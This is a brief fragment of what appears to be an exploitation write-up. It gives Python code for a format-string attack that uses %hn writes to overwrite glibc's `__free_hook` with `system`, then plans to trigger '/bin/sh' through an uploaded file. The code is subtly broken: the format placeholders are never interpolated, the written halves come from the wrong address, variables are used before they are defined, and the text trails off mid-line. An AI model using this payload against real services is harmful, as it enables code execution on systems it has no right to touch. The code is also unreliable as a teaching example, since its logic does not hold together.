2021 — Sone-127
```python
payload = b'A'*8  # padding for alignment
payload += f"%lowc%8$hn".encode()
payload += f"%high-lowc%9$hn".encode()
payload += b'B'*8
payload += p64(target)    # argument 8
payload += p64(target+2)  # argument 9
```

Send the payload with echo and the service writes the low and high halves of `system` into `__free_hook`. Now we need a chunk that contains the string "/bin/sh". The simplest way is to upload a file named `sh.txt` with that exact content.
```python
target = free_hook
low = target & 0xffff
high = (target >> 16) & 0xffff
# 1️⃣ Leak libc
libc_base = leak_libc(io)
payload
```





